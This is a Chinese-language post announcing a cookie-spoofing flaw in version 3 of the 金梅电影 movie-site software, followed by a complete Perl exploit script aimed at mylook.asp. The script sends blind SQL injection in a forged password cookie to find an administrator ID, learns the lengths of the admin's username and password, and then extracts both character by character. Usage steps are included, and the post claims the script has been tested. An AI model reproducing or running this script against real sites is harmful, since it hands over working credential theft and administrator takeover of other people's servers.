金梅电影多个文件存在cookie未经过滤。可造成cookie欺骗!
涉及版本:金梅电影第三版
以下脚本针对mylook.asp文件!(已测试)
#用法:先注册用户名为jjhyt的用户,密码任意!
#cookie.pl 127.0.0.1 /film/mylook.asp jjhyt
#!/usr/bin/perl
#The script Crack admin for 金梅电影程序
#Code by 520world QQ:20000445
use IO::Socket;
system(cls);
$ARGC = @ARGV;
if ($ARGC < 3)
{
print " ";
print " * The script Crack admin for 金梅电影程序 * ";
print " Example: cookie.pl 127.0.0.1 /film/mylook.asp jjhyt ";
print " cookie.pl <host> <way> <user> [<errorinfo>] ";
exit;
}
$host = @ARGV[0];
$way = @ARGV[1];
$userid = @ARGV[2];
$errinfo = @ARGV[3]||没有登陆;
$port = 80;
print " 开始在 $host 上进行测试,请等待...... ";
for ($adminid=0;$adminid<=100;$adminid++)
{
$way1 = $way;
$req = "GET $way HTTP/1.0 ".
"Host: $host ".
"Referer: $host ".
"Cookie: ASPSESSIONIDQATSTBCC=FLLJMBABHKJJADLNPELEEGDO; password=1%27%20OR%20$adminid%3D(select%20min(id)%20from%20password%20where%201%3D1)%20and%20%271; okerer=yesok; askmejoin; userid=$userid; myter=yes ";
@res = &connect;
#print @res;
if ("@res" !~ /$errinfo/)
{
print " * 发现一管理员ID号为: $adminid ";
last;
}
}
for ($passlen=0;$passlen<=10;$passlen++)
{
$way1 = $way;
$req = "GET $way HTTP/1.0 ".
"Host: $host ".
"Referer: $host ".
"Cookie: ASPSESSIONIDQATSTBCC=FLLJMBABHKJJADLNPELEEGDO; password=1%27%20OR%20$adminid%3D(select%20min(id)%20from%20password%20where%20len(pwd)%3D$passlen)%20and%20%271; okerer=yesok; askmejoin; userid=$userid; myter=yes ";
@res = &connect;
if ("@res" !~ /$errinfo/)
{
print " * 发现ID=$adminid的管理员的密码长度为: $passlen 位 ";
last;
}
}
for ($userlen=0;$userlen<=20;$userlen++)
{
$way1 = $way;
$req = "GET $way HTTP/1.0 ".
"Host: $host ".
"Referer: $host ".
"Cookie: ASPSESSIONIDQATSTBCC=FLLJMBABHKJJADLNPELEEGDO; password=1%27%20OR%20$adminid%3D(select%20min(id)%20from%20password%20where%20len(name)%3D$userlen)%20and%20%271; okerer=yesok; askmejoin; userid=$userid; myter=yes ";
@res = &connect;
if ("@res" !~ /$errinfo/)
{
print " * 发现ID=$adminid的管理员的用户名长度为: $userlen 位 ";
last;
}
}
@dig=(0..9);
@char=(a..z);
@tchar=qw(` ~ ! + @ # $ ^ * ( ) _ = - { } [ ] : " ; < > ? | , . / \);
@dic=(@dig,@char,@tchar);
@dic1=(@char,@dig,@tchar);
print " 开始尝试获取ID=$adminid的管理员的用户名及密码,请等待...... ";
for ($userlocat=1;$userlocat<=$userlen;$userlocat++)
{
foreach $usertemp(@dic1)
{
$user=$userdic.$usertemp;
$way1 = $way;
$req = "GET $way HTTP/1.0 ".
"Host: $host ".
"Referer: $host ".
"Cookie: ASPSESSIONIDQATSTBCC=FLLJMBABHKJJADLNPELEEGDO; password=1%27%20OR%20$adminid%3D(select%20min(id)%20from%20password%20where%20mid(name,1,$userlocat)%3D$user)%20and%20%271; okerer=yesok; askmejoin; userid=$userid; myter=yes ";
@res = &connect;
if ("@res" !~ /$errinfo/)
{
if ($userlocat==$userlen){print " * 获取成功!!! ID=$adminid的管理员名字是: $user ";last;}
print " * ID=$adminid的管理员名字的前 $userlocat 位为 $user";
$userdic=$userdic.$usertemp;
last;
}
}
}
for ($passlocat=1;$passlocat<=$passlen;$passlocat++)
{
foreach $passtemp(@dic)
{
$pass=$passdic.$passtemp;
$way1 = $way;
$req = "GET $way HTTP/1.0 ".
"Host: $host ".
"Referer: $host ".
"Cookie: ASPSESSIONIDQATSTBCC=FLLJMBABHKJJADLNPELEEGDO; password=1%27%20OR%20$adminid%3D(select%20min(id)%20from%20password%20where%20mid(pwd,1,$passlocat)%3D$pass)%20and%20%271; okerer=yesok; askmejoin; userid=$userid; myter=yes ";
@res = &connect;
if ("@res" !~ /$errinfo/)
{
if ($passlocat==$passlen){print " * 获取成功!!! ID=$adminid的管理员密码是: $pass";last;}
print " * ID=$adminid的管理员密码的前 $passlocat 位为 $pass";
$passdic=$passdic.$passtemp;
last;
}
}
}
print " * 测试完毕. 获取到一个用户名为$user密码为$pass的管理员权限! * ";
print " ";
#system(pause);
sub connect
{
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host ";
print $connection $req;
my @res = <$connection>;
close $connection;
return @res;
}
附件为脚本原件,将.txt改为.pl即可编译。
